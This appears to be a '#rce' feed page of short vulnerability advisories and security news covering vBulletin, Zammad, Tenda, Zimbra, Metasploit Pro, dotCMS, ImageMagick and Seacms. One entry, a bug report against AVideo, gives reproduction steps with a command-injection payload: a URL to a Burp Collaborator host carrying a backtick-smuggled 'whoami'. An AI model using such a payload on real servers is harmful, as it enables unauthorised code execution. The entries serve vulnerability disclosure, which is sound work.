#rce

vBulletin before 5.6.9 PL1 allows an unauthenticated remote attacker to execute arbitrary code via a crafted HTTP request that triggers deserialization. This occurs because verify_serialized checks that a value is serialized by calling unserialize and then checking for errors. The fixed versions are 5.6.7 PL1, 5.6.8 PL1, and 5.6.9 PL1.

A vulnerability in Zammad v5.3.0 allows attackers to execute arbitrary code or escalate privileges via a crafted message sent to the server.

Tenda W20E v15.11.0.6 was discovered to contain multiple stack overflows in the function formSetStaticRoute via the parameters staticRouteNet, staticRouteMask, staticRouteGateway, staticRouteWAN.

A new intelligence gathering campaign linked to the prolific North Korean state-sponsored Lazarus Group leveraged known security flaws in unpatched Zimbra devices to compromise victim systems. That's according to Finnish cybersecurity company WithSecure (formerly F-Secure), which codenamed the incident No Pineapple. Targets of the malicious operation included a healthcare research organization

Description: I found a very critical vulnerability on your open source program called RCE (Remote Code Execution) where an attacker can arbitrary execute code in the server Impact: An attacker could execute remote codes on your system Step to Reproduce: 1. Go to My Videos tab https://demo.avideo.com/mvideos 2. Click "Embed a video link" 3. Get your Burp Suite Collaborator link Example: [o4ta880iz4vap09kaqw400po8fe52u.oastify.com](http://o4ta880iz4vap09kaqw400po8fe52u.oastify.com/) 4. Now put this RCE payload in the Video Link field [http://o4ta880iz4vap09kaqw400po8fe52u.oastify.com?`whoami`](http://o4ta880iz4vap09kaqw400po8fe52u.oastify.com/?whoami) then click Save 5. Now go to BurpSuite Collaborator client and see the response

Rapid7 Metasploit Pro versions 4.21.2 and lower suffer from a stored cross site scripting vulnerability, due to a lack of JavaScript request string sanitization. Using this vulnerability, an authenticated attacker can execute arbitrary HTML and script code in the target browser against another Metasploit Pro user using a specially crafted request. Note that in most deployments, all Metasploit Pro users tend to enjoy privileges equivalent to local administrator.

An issue was discovered in dotCMS core 4.x through 22.10.2. An authenticated directory traversal vulnerability in the dotCMS API can lead to Remote Code Execution.

Cybersecurity researchers have disclosed details of two security flaws in the open source ImageMagick software that could potentially lead to a denial-of-service (DoS) and information disclosure. The two issues, which were identified by Latin American cybersecurity firm Metabase Q in version 7.1.0-49, were addressed in ImageMagick version 7.1.0-52, released in November 2022. A

Seacms v12.7 was discovered to contain a remote code execution (RCE) vulnerability via the ip parameter at admin_ ip.php.

Two security holes — one particularly gnarly — could allow hackers the freedom to do as they wish with the popular edge equipment.